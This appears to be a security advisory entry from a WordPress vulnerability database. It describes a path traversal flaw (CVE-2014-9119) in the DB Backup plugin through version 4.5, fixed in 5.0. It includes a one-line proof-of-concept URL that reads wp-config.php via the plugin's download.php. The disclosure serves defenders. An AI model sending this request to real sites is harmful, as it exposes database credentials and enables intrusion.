DB Backup <= 4.5 - Path Traversal File Access



Description
Proof of Concept:

/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php

Affects Plugin

fixed in version 5.0

References

CVE 2014-9119

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 7554
Verified No
WPVDB ID 7726

Timeline

Publicly Published 2014-12-16 (over 5 years ago)
Added 2014-12-16 (over 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin